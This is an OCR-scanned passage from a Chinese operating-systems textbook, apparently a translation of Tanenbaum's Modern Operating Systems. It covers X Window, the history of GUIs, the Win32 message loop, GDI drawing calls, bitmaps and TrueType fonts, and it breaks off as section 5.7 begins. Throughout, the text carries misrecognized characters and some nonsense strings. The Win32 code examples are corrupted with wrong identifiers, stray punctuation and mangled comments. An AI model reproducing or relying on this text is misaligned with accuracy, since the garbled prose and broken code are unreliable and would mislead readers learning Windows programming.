化 。 下 一 条 语句 对 XSelectmnput 的 调用 通知 X 服 务 吉 程序 准备 处 理 哪些 事 
件 ， 在 本 例 中 ， 程 序 对 鼠标 点 击 、 键 盘 融 击 以 及 窗口 被 显现 感 兴趣 。 实 








际 上 ， 一 个 真正 的 程序 还 会 对 其 他 事件 感 兴趣 。 最 后 ， 对 XMapRaised 
的 调用 将 新 窗口 作为 最 顶层 的 窗口 映射 到 屏幕 上 。 此 时 ， 窗 口 在 屏幕 上 
成 为 可 见 的 。 


主 循环 由 两 条 语句 构成 ， 并 且 在 逻辑 上 比 Windows 中 对 应 的 循环 要 
简单 得 多 。 此 处 ， 第 一 条 语句 获得 一 个 事件 ， 第 二 条 语句 对 事件 类 型 进 
行 分 派 从 而 进行 处 理 。 当 茶 个 事件 表明 程序 已 经 结束 的 时 候 ，running 被 
设置 为 0， 循 环 结 束 。 在 退出 之 前 ， 程 序 释放 了 图 形 上 下 文 、 窗 口 和 连 
接 。 








值得 一 提 的 是 ， 并 非 每 个 人 都 喜欢 GUI。 许 多 程序 员 更 喜欢 上 面 
5.6.2 节 讨论 的 那 种 传统 的 面 癌 命令 行 的 界面 。X 通 过 一 个 称 为 xterm 的 客 
户 程序 解决 了 这 一 问题 。 该 程序 仿真 了 一 人 台 吾 老 的 VT102 智 能 终端 ， 完 
全 具有 所 有 的 转 义 序列 。 因 此 ， 编 辑 器 《例如 vi 和 emacs) 以 及 其 他 使 
用 termcap 的 软件 无 需 修 改 就 可 以 在 这 些 窗口 中 工作 。 





3. 图 形 用 户 界 面 


大 多 数 个 人 计算 机 提供 了 GUI (Graphical User Interface， 图 形 用 户 
界面 ) 。 首 字母 缩写 词 GUI 的 发 音 是 “gooey”。 


GUI 是 由 斯 坦 福 研 究 院 的 Douglas Engelbart 和 他 的 研究 小 组 发 明 
的 。 之 后 GUI 被 Xerox PARC 的 研究 人 员 摹 仿 。 在 一 个 风 和 日 丽 的 日 子 ， 
Apple 公 司 的 共同 创立 者 Steve Jobs 参 观 了 PARC， 并 且 在 一 人 台 Xerox 计 算 





机 上 见 到 了 GUI。 这 使 他 产生 了 开发 一 种 新 型 计算 机 的 想法 ， 这 种 新 型 
计算 机 就 是 Apple Lisa。Lisa 因 为 太 过 郧 贵 因而 在 商业 上 是 失败 的 ， 但 是 
它 的 后 继 者 Macintosh 获 得 了 巨大 的 成 功 。 





当 Microsoft 得 到 Macintosh 的 原型 从 而 能 够 在 其 上 开发 Microsoft 
Office 时 ，Microsoft 请 求 Apple 发 放 界 面 许可 给 所 有 新 来 者 ， 这 样 
Macintosh 就 能 够 成 为 新 的 业界 标准 。 (Microsoft 从 Office 获 得 了 比 MS- 
DOS 多 得 多 的 收入 ， 所 以 它 愿 意 放 弃 MS-DOS 以 获得 更 好 的 平台 用 于 
Office. ) Apple 负 责 Macintosh 的 主管 Jean-Louis Gasske 拒 绝 了 Microsoft 
的 请 求 ， 并 且 Steve Jobst AF I Appen MRE RRE. w, 
Microsoft 得 到 了 界面 要 素 的 许可 证 ， 这 形成 了 Windows 的 基础 。 当 
Microsoft 开 始 追 上 Apple 时 ，Apple 提 起 了 对 Microsoft 的 诉讼 ， 声 称 
Miicrosoft 超 出 了 许可 证 的 界限 ， 但 是 法 官 并 不 认可 ， 并 且 Windows 继 续 
追赶 并 超过 了 Macintosn。 如 果 Gasske 同 意 Apple 内 部 许多 人 的 看 法 Cth 
们 也 希望 将 Macintosh 软 件 许可 给 任何 人 ) ， 那 么 Apple 或 许 会 因为 许可 
费 而 变 得 无 限 富 有， 并 且 现 在 就 不 会 存在 Windows 了 。 




















GUI 具 有 用 字符 WIMP 表 示 的 四 个 基本 要 素 ， 这 些 字母 分 别 代 表 窗 
O (Window) 、 图 标 con) . 3é52 (Menu) 和 定点 设备 (Pointing 
device) 。 窗 口 是 一 个 矩形 块 状 的 屏幕 区 域 ， 用 来 运行 程序 。 图 标 是 小 
符号 ， 可 以 在 其 上 点 击 导致 某 个 动作 发 生 。 菜 单 是 动作 列表 ， 人 们 可 以 
从 中 进行 选择 。 最 后 ， 定 点 设备 是 鼠标 、 跟 踩 球 或 者 其 他 硬件 设备 ， 用 








来 在 屏幕 上 移动 光标 以 便 选 择 项 目 。 


GUI 软件 可 以 在 用 户 级 代码 中 实现 〈 如 UNIX 系 统 所 做 的 那样 ) ， 
也 可 以 在 操作 系统 中 实现 〈 如 Windows 的 情况 ) 。 


GUI 系统 的 输入 仍然 使 用 键盘 和 鼠标 ， 但 是 输出 几乎 总 是 送 往 特殊 
的 硬件 电路 板 ， 称 为 图 形 适配器 (graphics adapter) 。 图 形 适 配器 包含 
特殊 的 内 存 ， 称 为 视频 RAM (video RAM) ， 它 保存 出 现在 屏幕 上 的 图 
像 。 高 端的 图 形 适 配器 通常 具有 强大 的 32 位 或 64 位 CPU 和 多 达 1GB 自 己 
的 RAM， 独 立 于 计算 机 的 主 存 。 


每 个 图 形 适 配器 文 持 几 种 屏幕 太 寸 。 常 见 的 矿 寸 是 1024x768、 
1280x960、1600x1200 和 1920x1200。 除 了 1920x1200 以 外 ， 所 有 这 些 尺 
寸 的 宽 高 比 都 是 4:3， 符 合 NTSC 和 PAL 电 视 机 的 屏幕 宽 高 比 ， 因 此 可 以 
在 用 于 电视 机 的 相同 的 监视 器 上 产生 正方 形 的 像素 。1920x1200 尺 寸 意 
在 用 于 宽屏 监视 器 ， 它 的 宽 高 比 与 这 一 分 辨 率 相 匹配 。 在 最 高 的 分 辨 率 
下 ， 每 个 像素 具有 24 位 的 彩色 显示 ， 只 是 保存 图 像 就 需要 大 约 6.5MB 的 
RAM， 所 以 ， 拥 有 256MB 或 更 多 的 RAM， 图 形 适 配器 就 能 够 一 次 保存 
许多 图 像 。 如 果 整 个 屏幕 每 秒 刷新 75 次 ， 那 么 视频 RAM 必 须 能 够 连续 
地 以 每 秒 489MB 的 速率 发 送 数据 。 











GUI 的 输出 软件 是 一 个 巨大 的 主题 。 单 是 关于 Windows GUI 就 写 下 
了 许多 1500 多 页 的 书 (例如 Petzold，1999; Simon，1997; Rector 和 


Newcomer, 1997) 。 显 然 ， 在 这 一 小 节 中 ， 我 们 只 可 能 浅 演 其 表面 并 

介绍 少许 基本 的 概念 。 为 了 使 讨论 具体 化 ， 我 们 将 描述 win32 API, 
它 被 Windows 的 所 有 32 位 版 本 所 文 特 。 在 一 般 意义 上 ， 其 他 GUI 的 输出 
软件 大 体 上 是 相似 的 ， 但 是 细节 迎 然 不 同 。 


屏 硕 上 的 基本 项 目 是 一 个 滤 形 区 域 ， 称 为 窗口 (window) 。 窗 口 
的 位 置 和 大 小 通过 给 定 两 个 斜 对 角 的 坐标 (以 像素 为 单位 〉 惟 一 地 决 
定 。 窗 口 可 以 包含 一 个 标题 条 、 一 个 菜单 条 、 一 个 工具 条 、 一 个 垂直 滚 
动 条 和 一 个 水 平 滚动 条 。 典 型 的 窗口 如 图 5-39 所 示 。 注 意 ，Windows 的 
坐标 系 将 原点 置 于 左上 角 并 且 y 向 下 增长 ， 这 不 同 于 数学 中 使 用 的 笛 卡 
儿 坐 标 。 
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图 5-39 XGA 显 示 器 上 位 于 (200,100) 处 的 一 个 窗口 样 例 


当 窗 口 被 创建 时 ， 有 一 些 参数 可 以 设 定 窗 口 是 否 可 以 被 用 户 移动 ， 
是 否 可 以 被 用 户 调 整 大 小 ， 或 者 是 否 可 以 被 用 户 深 动 (通过 拖 动 深 动 条 
上 的 拇指 ) 。 大 多 数 程序 产生 的 主 窗口 可 以 被 移动 、 调 整 大 小 和 滚动 ， 
这 对 于 Windows 程 序 的 编写 方式 具有 重大 的 意义 。 特 别 地 ， 程 序 必 须 被 
告知 关于 其 窗口 大 小 的 改变 ， 并 且 必 须 准 备 在 任何 时 刻 重 画 其 窗口 的 内 
容 ， 即 使 在 程序 最 不 期 望 的 时 候 。 











因此 ，Windows 程 序 是 面 癌 消息 的 。 涉 及 键盘 和 鼠标 的 用 户 操作 被 
Windows 所 捕获 ， 并 且 转 换 成 消息 ， 送 到 正在 被 访问 的 窗口 所 属于 的 程 
序 。 每 个 程序 都 有 一 个 消息 队列 ， 与 程序 的 所 有 窗口 相关 的 消息 都 被 发 
送 到 该 队列 中 。 程 序 的 主 循环 包括 提取 下 一 条 消 轧 ， 并 且 通 过 调用 针对 
该 消息 类 型 的 内 部 过 程 对 其 进行 处 理 。 在 某 些 情况 下 ，Windows 本 身 可 
以 绕 过 消息 队列 而 直接 调用 这 些 过 程 。 这 一 模型 与 UNIX 的 过 程 化 代码 
模型 完全 不 同 ，UNIX 模 型 是 提请 系统 调用 与 操作 系统 相互 作用 的 。 然 
而 ，X 是 面 问 事件 的 。 











为 了 使 这 一 编程 模型 更 加 清晰 ， 请 考虑 图 5-40 的 例子 。 在 这 里 我 们 
看 到 的 是 Windows 主 程序 的 框架 ， 它 并 不 完整 并 且 没 有 做 错误 检查 ， 但 
征 对 于 我 们 的 意图 而 言 它 显 示 了 足够 的 细节 。 程 序 的 开头 包含 一 个 头 文 
‘Fwindows.h, CURVE A. BURR. WAL. RARA, WR 
Windows 程 序 所 需要 的 其 他 信息 。 


#include <windows.h> 


int WINAPI WinMain(HINSTANCE h, HINSTANCE, hprev, char *szCmd, int iCmdShow) 
{ 

WNDCLASS wndclass; /* 本 窗口 的 类 对 象 */ 

MSG msg; 岩 进 入 的 消息 存放 在 这 里 */ 

HWND hwnd; E OMAN A CET) */ 


/* 初始 化 wndclass*/ E 

wndclass.lpfnWndProc = WndProc; /* 指示 调用 哪个 过 程 */ 
wndclass.lpszClassName = "Program name"; /* 标题 条 的 文本 */ 
wndclass.hlcon = Loadicon(NULL, IDI_APPLICATION); jx 装载 程序 图 标 */ 
wndclass.hCursor = LoadCursor(NULL, IDC_ARROW); jx 装载 鼠标 光标 */ 


RegisterClass(&wndclass); /* 癌 Windows 注 册 wndclass */ 
hwnd = CreateWindow ( ... ) 人/# 为 窗口 分 配 存 fifi */ 
ShowWindow(hwnd, iCmdShow); /* 在 屏 fie 上 显示 窗口 */ 
UpdateWindow(hwnd); /* 指示 窗 rie 制 自身 */ 


while (GetMessage(&msg, NULL, 0, 0)) {  /* 从 队列 中 获取 消息 */ 
TranslateMessage(&msg); /* 转换 消息 */ 
DispatchMessage(&msg); /* 将 msg 发 送 给 适当 的 过 程 */ 


return(msg.wParam); 


} 
long CALLBACK WndProc(HWND hwnd, UINT message, UINT wParam, long IParam) 
类 该 Hå 是 声 与 明 * 
switch (message) { 
case WM_CREATE: ...; return ...; /* 创建 窗 [ | */ 
case WM_PAINT: > Teturn ...; /* 重 绘 窗口 的 内 容 */ 
case WM_DESTROY: ...; return...;  /* 销毁 窗口 */ 


return(DefWindowProc(hwnd, message, wParam, IParam));/* 默认 */ 





图 5-40 Windows 主 程序 的 框架 


主 程序 以 一 个 声明 开始 ， 该 声明 给 出 了 它 的 名 字 和 参数 。WINAPI 
是 一 条 给 编译 器 的 指令 ， 让 编译 占 使 用 一 定 的 参数 传递 约定 并 且 不 需 
要 我 们 进一步 关心 。 第 一 个 参数 h 是 一 个 实例 句柄 ， 用 来 向 系统 的 其 他 
分 标识 程序 。 在 某 种 程度 上 ，Win32 是 面向 对 象 的 ， 这 意味 着 系统 包 
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含 对 象 “ 例 如 程序 、 文 件 和 窗口 ) 。 对 象 具 有 状态 和 相关 的 代码 ， 而 相 
天 的 代码 称 为 方法 Cmethod) ， 它 对 于 状态 进行 操作 。 对 象 是 使 用 句柄 
来 引用 的 ， 在 该 示例 中 ，h 标 识 的 是 程序 。 第 二 个 参数 只 是 为 了 加 后 兼 
容 才 出 现 的 ， 它 已 不 再 使 用 。 第 三 个 参数 szCmd 是 一 个 以 零 终止 的 字符 
串 ， 包 含情 动 该 程序 的 命令 行 ， 即 使 程序 不 是 从 命令 行 局 动 的 。 第 四 个 
参数 iCmdShow 表 明 程 序 的 初始 窗口 应 该 占据 整个 屏幕 ， 占 据 屏幕 的 一 
部 分 ， 还 是 一 点 也 不 占据 屏幕 《只 是 任务 条 ) 。 














该 声明 说 明了 一 个 广泛 采用 的 Microsoft 约 定 ， 称 为 匈牙利 记号 
(Hungarian notation) 。 该 名 称 是 一 个 涉及 波兰 记号 的 双关 语 ， 波 兰 记 
写 是 波兰 逻辑 学 家 J.Lukasiewicz 发 明 的 后 级 系统 ， 用 于 不 使 用 优先 级 和 
括号 表示 代数 公式 。 匈 牙 利 记 号 是 Microsoft 的 一 名 匈牙利 程序 员 Charles 
Simonyi 发 明 的 ， 它 使 用 标识 符 的 前 几 个 字符 来 指定 类 型 。 允 许 的 字母 
和 类 型 包括 c (character， 字 符 ) ~ w (word， 字 ， 现 在 意 指 无 从 号 16 位 


整数 ) 、i (integer，32 位 有 符号 整数 ) 、1 (long， 也 是 一 个 32 位 有 符号 











Po AY 


整数 ) 、s (string, ZIF) ~ sz (string terminated by a zero byte, WA 
字 节 终止 的 字符 串 ) ~ p (pointer， 指 针 ) ~ fn (function, KAO 和 

h (handle， 句 柄 ) 。 因 此 ， 举 例 来 说 ，szCmd 是 一 个 以 零 终止 的 字符 哩 
并 且 iCmdShow 是 一 个 整数 。 许 多 程序 员 认 为 在 变量 名 中 像 这 样 对 类 型 
进行 编码 没有 什么 价值 ， 并 且 使 Windows 代 码 异 常 地 难于 阅读 。 在 
UNIX 中 就 没有 类 似 这 样 的 约定 。 





每 个 窗口 必须 具有 一 个 相关 联 的 类 对 象 定义 其 属性 ， 在 图 5-40 中 ， 
类 对 象 是 wndclass。 对 象 类 型 WNDCLASS 具 有 10 个 字段 ， 其 中 4 个 字段 
在 图 5-40 中 被 初始 化 ， 在 一 个 以 实际 的 程序 中 ， 其 他 6 个 字段 也 要 被 初 
始 化 。 最 重要 的 字段 是 lpfnpWndProc， 它 是 一 个 指向 函数 的 长 〈 即 32 
位 ) 指针 ， 该 函数 处 理 引 向 该 窗口 的 消息 。 此 处 被 初始 化 的 其 他 字段 指 
出 在 标题 条 中 使 用 哪个 名 字 和 图 标 ， 以 及 对 于 鼠标 光标 使 用 哪个 符号 。 


在 wndclass 被 初始 化 之 后 ，RegisterClass 被 调用 ， 将 其 发 送 给 
Windows。 特 别 地 ， 在 该 调用 之 后 Windows 就 会 知道 当 各 种 事件 发 生 时 
要 调用 哪个 过 程 。 下 一 个 调用 CreateWindow 为 窗口 的 数据 结构 分 配 内 存 
并 且 返 回 一 个 句柄 以 便 以 后 引用 它 。 然 后 ， 程 序 做 了 另外 两 个 调用 ， 将 
窗口 轮廓 置 于 屏 医 之 上 ， 并 且 最 终 完全 地 填充 窗口 。 








此 刻 我 们 到 达 了 程序 的 主 循环 ， 它 包括 获取 消息 ， 对 消息 做 一 定 的 
转换 ， 然 后 将 其 传 回 Windows 以 便 让 Windows 调 用 WndProc 来 处 理 它 。 
要 回答 这 一 完整 的 机 制 是 否 能 够 得 到 化 简 的 问题 ， 管 案 是 肯定 的 ， 但 是 


这 样 做 是 由 于 历史 的 缘故 ， 并 且 我 们 现在 坚持 这 样 做 。 


主 循环 之 后 是 过 程 WndProc， 它 处 理发 送 给 窗口 的 各 种 消息 。 此 处 
CALLBACK 的 使 用 与 上 面 的 WINAPI 相 类 似 ， 为 参数 指明 要 使 用 的 调用 
序列 。 第 一 个 参数 是 要 使 用 的 窗口 的 句柄 。 第 二 个 参数 是 消息 类 型 。 第 
三 和 第 四 个 参数 可 以 用 来 在 需要 的 时 候 提供 附加 的 信息 。 


消息 类 型 WM_CREATE 和 WM_DESTROY 分 别 在 程序 的 开始 和 结 
时 发 送 。 它 们 给 程序 机 会 为 数据 结构 分 配 内 存 ， 并 且 将 其 返回 。 





第 三 个 消息 类 型 WM_PAINT 是 一 条 指令 ， 让 程序 填充 窗口 。 它 不 
仅 当 窗口 第 一 次 绘制 时 被 调用 ， 而 且 在 程序 执行 期 间 也 经 常 被 调用 。 与 
基于 文本 的 系统 相反 ， 在 Windows 中 程序 不 能 够 假定 它 在 屏幕 上 画 的 东 
西 将 一 直 保持 在 那里 直到 将 其 删除 。 其 他 窗口 可 能 会 被 拖拉 到 该 窗口 的 
上 面 ， 菜 单 可 能 会 在 窗口 上 被 拉 下 ， 对 话 框 和 工具 提示 可 能 会 覆盖 窗口 
的 某 一 部 分 ， 如 此 等 等 。 当 这 些 项 目 被 移 开 后 ， 窗 口 必须 重 绘 。 
Windows 告 知 一 个 程序 重 绘 窗口 的 方法 是 发 送 WM_PAINT 消 息 。 作 为 一 
种 友好 的 姿态 ， 它 还 会 提供 窗口 的 哪 一 部 分 曾经 被 覆盖 的 信息 ， 这 样 程 
序 就 更 加 容易 重新 生成 窗口 的 那 一 部 分 而 不 必 重 绘 整个 窗口 。 











Windows 有 两 种 方法 可 以 让 一 个 程序 做 茶 些 事情 。 一 种 方法 是 投递 
一 条 消息 到 其 消息 队列 。 这 种 方法 用 于 键盘 输入 、 鼠 标 输入 以 及 定时 器 
到 时 。 另 一 种 方法 是 发 送 一 条 消息 到 窗口 ， 从 而 使 Windows 直 接 调用 
WandProc 本 喘 。 这 一 方法 用 于 所 有 其 他 事件 。 由 于 当 一 条 消息 完全 被 处 
理 后 Windows 会 得 到 通报 ， 这 样 Windows 就 能 够 避免 在 前 一 个 调用 完成 
前 产生 新 的 调用 ， 由 此 可 以 避免 竞争 条 件 。 











还 有 许多 其 他 消息 类 型 。 当 一 个 不 期 望 的 消息 到 达 时 为 了 避免 异常 
行为 ， 最 好 在 WndProc 的 结尾 处 调用 DefWindowProc， 让 默认 处 理 过 程 
处 理 其 他 情形 。 





总 之 ，Windows 程 序 通常 创建 一 个 或 多 个 窗口 ， 每 个 窗口 具有 一 个 
类 对 象 。 与 每 个 程序 相关 联 的 是 一 个 消息 队列 和 一 组 处 理 过 程 。 最 终 ， 
程序 的 行为 由 到 来 的 事件 驱动 ， 这 些 事件 由 处 理 过 程 来 处 理 。 与 UNIX 
采用 的 过 程 化 观点 相 比 ， 这 是 一 个 完全 不 同 的 世界 观 模 型 。 





对 屏幕 的 实际 绘图 是 由 包含 几 百 个 过 程 的 程序 包 处 理 的 ， 这 些 过 程 
捆 在 一 起 形成 了 GDI (Graphics Device Interface, KISH) 。 它 
能 够 处 理 文本 和 各 种 类 型 的 图 形 ， 并 且 被 设计 成 与 平台 和 设备 无 关 的 。 
在 一 个 程序 可 以 在 窗口 中 绘图 ( 即 绘 画 ) 之 前 ， 它 需要 获取 一 个 设备 上 
FX (device context) : 设备 上 下 文 是 一 个 内 部 数据 结构 ， 包 含 窗口 的 
属性 ， 诸 如 当前 字体 、 文 本 颜色 、 背 景 颜 色 等 。 大 多 数 GDI 调 用 使 用 设 
备 上 下 文 ， 不 管 是 为 了 绘图 ， 还 是 为 了 获取 或 设置 属性 。 














有 许 许 多 多 的 方法 可 用 来 获取 设备 上 下 文 。 下 面 是 一 个 获取 并 使 用 
设备 上 下 文 的 简单 例子 : 





hdc=GetDC (hwnd) ; 
TextOut (hdc, x, y; psText, iLength); 
ReleaseDC (hwnd; hdc); 








一 条 语句 获取 一 个 设备 上 下 文 的 句柄 hdc。 第 二 条 语句 使 用 设备 
上 上 下文 在 屏幕 上 写 一 行文 本 ， 该 语句 设 定 了 字符 串 开 始 处 的 《xy) AA 
标 、 一 个 指向 字符 串 本 身 的 指针 以 及 字符 串 的 长 度 。 第 三 个 调用 释放 设 
备 上 下 文 ， 表 明 程序 在 当时 已 通过 了 绘图 操作 。 注 意 ，hdc 的 使 用 方式 








与 UNIX 的 文件 描述 符 相 类 似 。 还 需要 注意 的 是 ，ReleaseDC 包 含 元 余 的 
言 息 ( 使 用 hdc 就 可 以 惟一 地 指定 一 个 窗口 ) 。 使 用 不 具有 实际 价值 的 
郊 余 信息 在 Windows 中 是 很 常见 的 。 


另 一 个 有 趣 的 注意 事项 是 ， 当 hdc 以 这 样 的 方式 被 获取 时 ， 程 序 只 
能 够 写 窗 口 的 客户 区 ， 而 不 能 写 标 题 条 和 窗口 的 其 他 部 分 。 在 内 部 ， 在 
设备 上 下 文 的 数据 结构 中 ， 维 护 着 一 个 修剪 区 域 。 在 修剪 区 域 之 外 的 任 
何 绘图 操作 都 将 被 忽略 。 然 而 ， 存 在 着 男 一 种 获取 设备 上 下 文 的 方法 
GetWindowDC， 它 将 修剪 区 域 设 置 为 整个 窗口 。 其 余 的 调用 以 其 他 的 
方法 限定 修剪 区 域 。 拥 有 多 种 调用 做 几乎 相同 的 事情 是 windows 的 另 一 


个 特性 。 





GDI 的 完全 论述 超出 了 这 里 讨论 的 范围 。 对 于 感 兴趣 的 读者 ， 上 面 
引用 的 参考 文献 提供 了 补充 的 信息 。 然 而 ， 关 于 GDI 可 能 还 值得 再 说 几 
句 话 ， 因 为 GDI 是 如 此 之 重要 。GDI 具 有 各 种 各 样 的 过 程 调用 以 获取 和 
释放 设备 上 下 文 ， 获 取 关 于 设备 上 下 文 的 信息 ， 获 取 和 设置 设备 上 下 文 
的 属性 〈 例 如 背景 颜色 ) ， 使 用 GDI 对 象 〈 例 如 画笔 、 画 刷 和 字体 ， 其 
中 每 个 对 象 都 有 自己 的 属性 ) 。 最 后 ， 当 然 存 在 许多 实际 在 屏幕 上 绘图 
的 GDI 调 用 。 











绘图 过 程 分 成 四 种 类 型 : 绘制 直线 和 曲线 、 绘 制 填充 区 域 、 管 理 位 
图 以 及 显示 文本 。 我 们 在 上 面 看 到 了 绘制 文本 的 例子 ， 所 以 让 我 们 快速 
地 看 看 其 他 类 型 之 一 。 调 用 





Rectangle (hdc, xleft, ytop, xright, ybottom) ; 


将 绘制 一 个 填充 的 矩形 ， 它 的 左上 和 角 和 右 下 角 分 别 是 Cxleft,ytop ) 
All Cxright,ybottom) 。 例 如 


Rectangle (hdc,2,1,6,4); 


将 绘制 一 个 如 图 5-41 所 示 的 矩形 。 线 宽 和 颜色 以 及 填充 颜色 取 自 设 
备 上 下 文 。 其 他 的 GDI 调 用 在 形式 上 是 类 似 的 。 





图 5-41 使 用 Rectanpgle 绘 制 矩 形 的 例子 。 每 个 方 框 代 表 一 个 像素 
4. 位 图 


GDI 过 程 是 矢量 图 形 学 的 实例 。 它 们 用 于 在 屏幕 上 放置 几何 图 形 和 
文本 。 它 们 能 够 十 分 容易 地 缩放 到 较 大 和 较 小 的 屏幕 〈 如 采 屏 幕 上 的 像 





素数 是 相同 的 ) 。 它 们 还 是 相对 设备 无 关 的 。 一 组 对 GDI 过 程 的 调用 可 
以 聚集 在 一 个 文件 中 ， 描 述 一 个 复杂 的 图 画 。 这 样 的 文件 称 为 Windows 
元 文件 (metafile) ， 广 泛 地 用 于 从 一 个 Windows 程 序 到 另 一 个 Windows 
程序 传送 图 画 。 这 样 的 文件 具有 扩展 名 .wmf。 





许多 Windows 程 序 允 许 用 户 复制 图 画 《〈 或 一 部 分 ) 并 且 放 在 
Windows 的 甬 贴 板 上 ， 然 后 用 户 可 以 转 入 另 一 个 程序 并 且 炸 贴 甬 贴 板 的 
内 容 到 为 一 个 文档 中 。 做 这 件 事 的 一 种 方法 是 由 第 一 个 程序 将 图 画 表 示 
为 Windows 元 文件 并 且 将 其 以 .wmf 格 式 放 在 吏 贴 板 上 。 此 外 ， 还 有 其 他 
的 方法 做 这 件 事 。 





并 不 是 计算 机 处 理 的 所 有 图 像 都 能 够 使 用 矢量 图 形 学 来 生成 。 例 
如 ， 照 片 和 视频 就 不 使 用 矢量 图 形 学 。 反 之 ， 这 些 项 目 可 以 通过 在 图 像 
上 才 兰 一 层 网 格 扫描 输入 。 每 一 个 网 格 方块 的 平均 红 、 绿 、 监 取 值 被 采 
样 并 且 保存 为 一 个 像素 的 值 。 这 样 的 文件 称 为 位 图 (bitmap) 。 
Windows 中 有 大 量 的 工具 用 于 处 理 位 图 。 





位 图 的 另 一 个 用 途 是 用 于 文本 。 在 茶 种 字体 中 表示 一 个 特殊 字符 的 
一 种 方法 是 将 其 表示 为 小 的 位 图 。 于 是 往 屏 幕 上 添加 文本 就 变 成 移动 位 
图 的 事情 。 











使 用 位 图 的 一 种 一 般 方 法 是 通过 调用 BitBlt 过 程 ， 该 过 程 调用 如 
下 : 














BitBIt (dsthdc,dx,dy,wid,ht,srchdc,sx,sy,rasterop) ; 





在 其 最 简单 的 形式 中 ， 该 过 程 从 一 个 究 口 中 的 一 个 矩形 复制 位 图 到 
为 一 个 窗口 (或 同一 个 窗口 ) 的 一 个 矩形 中 。 前 三 个 参数 设 定 目标 窗口 
和 位 置 ， 然 后 是 宽度 和 高 度 ， 接 下 来 是 源 窗 口 和 位 置 。 注 意 ， 每 个 窗口 
都 有 其 目 己 的 坐标 系 ，〈0，0) 在 窗口 的 左上 角 处 。 最 后 一 个 参数 将 在 
下 面 描述 。 














us) 
H 





1tBlt (hdce2,1,2,5,7,hdcl,2,2,SRCCOPY) > 











的 效果 如 图 5-42 所 示 。 注 意 字 母 A 的 整个 5x7 区 域 被 复制 了 ， 包 括 缘 
景 颜色 。 








除了 复制 位 图 外 ，BitBlt 还 可 以 做 很 多 事情 。 最 后 一 个 参数 所 供 了 
执行 布尔 运算 的 可 能 ， 从 而 可 以 将 源 位 图 与 目标 位 图 合并 在 一 起 。 例 
如 ， 源 位 图 可 以 与 目标 位 图 执行 或 运算 ， 从 而 融入 目标 位 图 ， 源 位 图 还 
可 以 与 目标 位 图 执行 异 或 运算 ， 该 运算 保持 了 源 位 图 和 目标 位 图 的 特 
征 。 








位 图 具有 的 一 个 问题 是 它们 不 能 缩放 。8x12 方 框 内 的 一 个 字符 在 
640x480 的 显示 器 上 看 起 来 是 适度 的 。 然 而 ， 如 果 该 位 图 以 每 英寸 1200 
点 复制 到 10 200 位 x13 200 位 的 打印 页 面 上 ， 那 么 字符 宽度 (8 像素 ) 为 
8/1200 英 二 或 0.17mm。 此 外 ， 在 具有 不 同 彩色 属性 的 设备 之 间 进 行 复 


制 ， 或 者 在 单 色 设备 与 彩色 设备 之 间 进 行 复制 效果 并 不 理想 。 





图 5-42 使 用 BitBlt 复 制 位 图 : a) ZH aT; bb) 复制 后 


由 于 这 样 的 缘故 ，Windows 还 支持 一 个 称 为 DIB (Device 
Independent Bitmap， 设 备 无 关 的 位 图 ) 的 数据 结构 。 采 用 这 种 格式 的 文 
件 使 用 扩展 名 .bmp。 这 些 文件 在 像素 之 前 具有 文件 与 信息 头 以 及 一 个 颜 
色 表 ， 这 样 的 信息 使 得 在 不 同 的 设备 之 间 移 动 位 图 十 分 容易 。 





5. 字 体 


在 Windows 3.1 版 之 前 的 版 本 中 ， 字 符 表 示 为 位 图 ， 并 且 使 用 BitBlt 
复制 到 屏幕 上 或 者 打印 机 上 。 这 样 做 的 问题 是 ， 正 如 我 们 刚刚 看 到 的 ， 
在 屏幕 上 有 意义 的 位 图 对 于 打印 机 来 说 太 小 了 。 此 外 ， 对 于 每 一 尺寸 的 
每 个 字符 ， 需 要 不 同 的 位 图 。 换 句 话 说， 给 定 字 符 A 的 10 点 阵 字 型 的 位 
图 ， 没 有 办 法 计算 它 的 12 点 阵 字 型 。 因 为 每 种 字体 的 每 一 个 字符 可 能 都 








需要 从 4 点 到 120 点 范围 内 的 各 种 太 寸 ， 所 以 需要 的 位 图 的 数目 是 巨大 
Ho BES RTP OAR Ut fi] AL EAR T. 








该 问题 的 解决 办 法 是 TrueType 字 体 的 引入 ，TrueType 字 体 不 是 位 图 
而 是 字符 的 轮廓 。 每 个 TrueType 字 符 是 通过 围绕 其 周 界 的 一 系列 点 来 定 
义 的 ， 所 有 的 点 都 是 相对 于 〈0，0) 原点 。 使 用 这 一 系统 ， 放 大 或 者 缩 
小 字符 是 十 分 容易 的 ， 必 须要 做 的 全 部 事情 只 是 将 每 个 坐标 乘 以 相同 的 
比例 因子 。 采 用 这 种 方法 ，TrueType 字 符 可 以 放大 或 者 缩小 到 任意 的 点 
阵 尺 寸 ， 甚 至 是 分 数 点 阵 尺 寸 。 一 旦 给 定 了 适当 的 尺寸 ， 各 个 点 可 以 使 
用 幼儿 园 教 的 著名 的 逐 点 连 算法 连接 起 来 (注意 现代 幼儿 园 为 了 更 加 交 
请 的 结果 而 使 用 曲线 矿 ) 。 轮 廓 完成 之 后 ， 就 可 以 填充 字符 了 。 图 5-43 
给 出 了 茶 些 字符 缩放 到 三 种 不 同 点 阵 扩 二 的 一 个 例子 。 
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图 5-43 不 同 点 阵 尺 寸 的 字符 轮廓 的 一 些 例子 





一 旦 填充 的 字符 在 数学 形式 上 是 可 用 的 ， 就 可 以 对 它 进行 栅 格 化 ， 

也 惑 是 说 ， 以 任何 期 望 的 分 辨 率 将 其 转换 成 位 图 。 通 过 首先 缩放 然后 栅 

格 化， 我 们 可 以 肯定 显示 在 屏幕 上 的 字符 与 出 现在 打印 机 上 的 字符 将 是 

能 接近 的 ， 差 别 只 在 于 量化 误差 。 为 了 进一步 改进 质量 ， 可 以 在 每 

个 字符 中 租 入 表明 如 何 进行 栅 格 化 的 线索 。 例 如 ， 字 母 T 顶 端的 两 个 衬 
线 应 该 是 完全 相同 的 ， 否 则 由 于 舍 入 误差 可 能 就 不 是 这 样 的 情况 了 。 





[1] Athena (雅典 娜 ) 指 麻 省 理工 学 院 MIT) 校园 范围 内 基于 UNIX 的 
计算 环境 。 译 者 注 





5.7 FBP 


多 年 来 ， 主 流 计 算 范 式 一 直 在 中 心 化 计算 和 分 散 化 计算 之 间 振 荡 。 
最 早 的 计算 机 《例如 ENIAC) 虽然 是 庞然大物 ， 但 实际 上 是 个 人 计算 
机 ， 因 为 一 次 只 有 一 个 人 能 够 使 用 它 。 然 后 出 现 的 是 分 时 系统 ， 在 分 时 
系统 中 许多 远程 用 户 在 简单 的 终端 上 共享 一 个 大 型 的 中 心计 算 机 。 接 下 
来 是 PC 时 代 ， 在 这 一 阶段 用 户 再 次 拥有 他 们 自己 的 个 人 计算 机 。 

